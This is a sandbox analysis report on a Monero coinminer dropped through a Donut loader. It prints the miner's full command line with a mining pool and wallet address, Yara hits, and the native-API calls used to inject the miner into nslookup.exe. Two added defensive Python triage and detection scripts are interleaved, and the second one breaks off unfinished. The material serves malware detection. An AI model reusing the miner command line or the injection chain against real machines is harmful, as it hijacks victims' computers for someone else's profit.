Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 212.47.253.124:10300
Source: Joe Sandbox View | IP Address: 212.47.253.124
Source: Joe Sandbox View | ASN Name: OnlineSASFR
Source: Network traffic | Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49731 -> 212.47.253.124:10300
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: conhost.exe, 00000001.00000002.1725964191.000001575B3C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe (20 memory dumps: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp) | String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe (the same 20 memory dumps as the previous entry) | String found in binary or memory: https://xmrig.com/docs/algorithms
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 
0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 
0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s

              System Summary

              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
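Added example, not part of the Joe Sandbox report and not Joe Sandbox code: a small triage script for the memory-dump identifiers that appear in the Yara and string matches above. It assumes the dump name is laid out as process index, dump kind, sequence number, region base address and page protection, followed by three fields it leaves unparsed; that reading is inferred from the identifiers on this page (0x04 = PAGE_READWRITE, 0x40 = PAGE_EXECUTE_READWRITE) and is an assumption, as is the 0x140000000 default-image-base heuristic. The six sample lines are copied from the matches above; the names and constants are the example's own.

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Windows page-protection constants (winnt.h)
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40
# Default image base of a 64-bit EXE produced by the MSVC linker
DEFAULT_X64_EXE_BASE = 0x140000000

# Constructed sample input: "Source:" lines in the shape of the Yara memory matches above.
# Assumed dump-name layout: <process index>.<dump kind>.<sequence>.<base>.<page protection>.<3 unparsed>.sdmp
SAMPLE_REPORT = """\
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
"""

DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<kind>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\.[0-9A-F]{8}\.[0-9A-F]{8}\.sdmp"
)
RULE_RE = re.compile(r"Matched rule: (?P<rule>.+?)(?: Author: .*)?$")


@dataclass(frozen=True)
class DumpHit:
    process_index: int   # sandbox process index (0 = the submitted sample)
    base: int            # base address of the dumped region
    protect: int         # page protection of the dumped region
    rule: str

    @property
    def executable(self) -> bool:
        return self.protect == PAGE_EXECUTE_READWRITE

    @property
    def manually_mapped_image(self) -> bool:
        # The loader maps a real image as MEM_IMAGE with per-section protections;
        # one RWX region sitting at the default EXE base is what a manually mapped
        # PE (process hollowing) looks like from the outside.
        return self.executable and self.base == DEFAULT_X64_EXE_BASE


def parse_hits(report_text: str) -> list[DumpHit]:
    hits = []
    for line in report_text.splitlines():
        dump, rule = DUMP_RE.search(line), RULE_RE.search(line)
        if dump and rule:
            hits.append(DumpHit(int(dump["proc"], 16), int(dump["base"], 16),
                                int(dump["protect"], 16), rule["rule"]))
    return hits


def triage(hits: list[DumpHit]) -> dict[int, dict]:
    """Per process: which regions hold executable payload and which are plain
    read-write data (buffers that merely contain miner strings), plus whether any
    hit looks like a manually mapped PE."""
    summary = defaultdict(lambda: {"rwx": set(), "rw": set(), "rules": set(), "mapped_image": False})
    for h in hits:
        entry = summary[h.process_index]
        entry["rules"].add(h.rule)
        entry["rwx" if h.executable else "rw"].add(h.base)
        entry["mapped_image"] = entry["mapped_image"] or h.manually_mapped_image
    return dict(summary)


if __name__ == "__main__":
    for proc, entry in sorted(triage(parse_hits(SAMPLE_REPORT)).items()):
        print(proc, entry)
```

Run over the hits listed above, the split is the useful part: process indices 12 and 13 (the two nslookup.exe instances) each carry a single PAGE_EXECUTE_READWRITE region at 0x140000000 that matches all three miner rules, which is a manually mapped PE rather than an image the loader mapped; indices 1 and 14 (conhost.exe) carry RWX private regions matching the Donut loader rules, i.e. the loader shellcode that stages the miner; the many hits at 0x13CBC45x000 and 0x1E32C45x000 in processes 9 and 11 are PAGE_READWRITE, consistent with buffers that only hold xmrig's banner and URL strings. Memory triage should start from the RWX hits, not from the string matches.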
              Source: C:\Windows\System32\nslookup.exe Process Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\boooba.exe Code function: 0_2_00401D58 NtAllocateVirtualMemory
              Source: C:\Users\user\Desktop\boooba.exe Code function: 0_2_00401D18 NtWriteVirtualMemory
              Source: C:\Users\user\Desktop\boooba.exe Code function: 0_2_004019D8 NtCreateThreadEx
              Source: C:\Users\user\Desktop\boooba.exe Code function: 0_2_00401D98 NtProtectVirtualMemory
              Source: C:\Users\user\Desktop\boooba.exe Code function: 0_2_00401C98 NtClose
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 10_2_00401D58 NtAllocateVirtualMemory
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 10_2_00401D18 NtWriteVirtualMemory
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 10_2_004019D8 NtCreateThreadEx
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 10_2_00401D98 NtProtectVirtualMemory
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 10_2_00401C98 NtClose
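The functions listed for boooba.exe and sihost64.exe above are the four primitives of classic remote thread injection (allocate in the target, write the payload, make it executable, start a thread on it) plus NtClose, and the identical addresses in both binaries show sihost64.exe is a copy of the dropper. The following added example, which is not from the report and is not the sample's or Joe Sandbox's code, shows the detection logic an analyst would run over a per-process native-API trace to recover that chain while ignoring the same calls made against the caller's own process. The trace format, PIDs, handles and sizes are constructed for the example; only the target base 0x140000000 mirrors where the report finds the unpacked miner inside nslookup.exe.

```python
from __future__ import annotations

from dataclasses import dataclass

# Pseudo-handle (-1) that refers to the calling process itself
NT_CURRENT_PROCESS = 0xFFFFFFFFFFFFFFFF
# winnt.h page protections that permit execution:
# PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY
EXECUTABLE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}

# Constructed trace (not Joe Sandbox output): "<pid> <api> key=0x.. ...", one call per line.
# pid 4420 mirrors the injector above: it allocates in a foreign process (handle 0x2a8), writes
# a PE into it at the default x64 image base, flips the region to RWX and starts a thread in it.
SAMPLE_TRACE = """\
4420 NtAllocateVirtualMemory handle=0x2a8 addr=0x140000000 size=0x2f3000 protect=0x04
4420 NtWriteVirtualMemory    handle=0x2a8 addr=0x140000000 size=0x400
4420 NtWriteVirtualMemory    handle=0x2a8 addr=0x140001000 size=0x2f2000
4420 NtProtectVirtualMemory  handle=0x2a8 addr=0x140000000 size=0x2f3000 protect=0x40
4420 NtCreateThreadEx        handle=0x2a8 addr=0x1400a1b00
# same primitives against the caller's own process (what a JIT does): not injection
5100 NtAllocateVirtualMemory handle=0xffffffffffffffff addr=0x1f0000 size=0x1000 protect=0x40
5100 NtWriteVirtualMemory    handle=0xffffffffffffffff addr=0x1f0000 size=0x200
5100 NtCreateThreadEx        handle=0xffffffffffffffff addr=0x1f0000
# partial chain: writes foreign memory but never makes it executable or runs it
6200 NtAllocateVirtualMemory handle=0x1c4 addr=0x20000000 size=0x1000 protect=0x04
6200 NtWriteVirtualMemory    handle=0x1c4 addr=0x20000000 size=0x80
"""


@dataclass
class Call:
    pid: int
    api: str
    handle: int
    addr: int
    size: int = 0
    protect: int = 0


@dataclass
class Region:
    base: int
    size: int
    executable: bool        # executable at allocation time or after NtProtectVirtualMemory
    written: bool = False

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


@dataclass(frozen=True)
class Finding:
    pid: int
    target_handle: int
    region_base: int
    thread_start: int


def parse_trace(text: str) -> list[Call]:
    calls = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        pid, api, *kv = line.split()
        args = {k: int(v, 16) for k, v in (pair.split("=", 1) for pair in kv)}
        calls.append(Call(int(pid), api, args["handle"], args["addr"],
                          args.get("size", 0), args.get("protect", 0)))
    return calls


def detect_remote_injection(calls: list[Call]) -> list[Finding]:
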